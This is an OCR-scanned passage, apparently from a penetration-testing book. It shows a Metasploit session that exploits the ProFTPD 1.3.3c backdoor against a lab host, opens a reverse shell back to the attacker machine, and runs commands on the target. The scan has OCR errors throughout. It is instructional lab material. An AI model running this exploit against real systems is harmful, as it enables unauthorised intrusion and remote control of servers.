exploit/unix/ftp/proftpd 133¢_ backdoor 2016-12-02 excellent 
exploit/unix/ftp/proftpd_modcopy exec 2015-04-22 excellent 


maf > use exploit/unix/ftp/proftpd 133c_backdoor 
maf exploit(unix/ftp/proftpd 133¢_ backdoor) > show options 


Mod 


ule options (exploit/unix/ftp/proftpd 133c backdoor): 
Name Current Setting Required Description 

RHOST yes The target address 
RPORT 21 yes The target port (TCP) 


Exploit target: 


Id Name 


© Automatic 


maf exploit(unix/ftp/proftpd_133c_backdoor) > set RHOST 192.168.25.132 
RHOST => 192,168.25. 132 
msf exploit(unix/ftp/proftpd_133c_backdoor) > exploit 


Started reverse TCP double handler on 192.168.25.128:4444 
192.168.25.132:21 - Sending Backdoor Conmand 
Accepted the first client connection... 
Accepted the second client connection. . 
Command: echo ClwmatNvsNIhpE22; 

Writing to socket A 

Writing to socket 8 

Reading from sockets... 

Reading from socket A 

A: *ClwmathvsNInpE22\r\n" 

Matching. . 

B is input... 


Description 

ProFTPO 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (FreeBSD) 
ProFTPO 1.2 - 1.3.0 sreplace Buffer Overflow (Linux) 

ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (Linux) 
NetSupport Manager Agent Remote Buffer Overflow 
ProFTPO-1.3.3¢ Backdoor Command Execution 

ProFTPO 1.3.5 Mod Copy Command Execution 


Command shell session 2 opened (192.168.25.128:4444 -> 192.168,25,132:41588) ðt 2018-09-27 15:55:32 +0530 


uname -a 
Linux vtesec 4.106.6-28-generic #32-16.04.2-Ubuntu SMP Thu Jul 20 10:19:48 UTC 2017 x86_64 x86 64 x86 64 GNU/Linux 


Figure 4-11. Output of the search query for proftpd and execution of 
the proftpf_133c_backdoor exploit on the target system 


The exploit code runs successfully and gives you a shell on the target 


system. 


Hence, you were successful in exploiting your target in two different 


ways, once through WordPress and another through the FTP server. 


Congratulations! 
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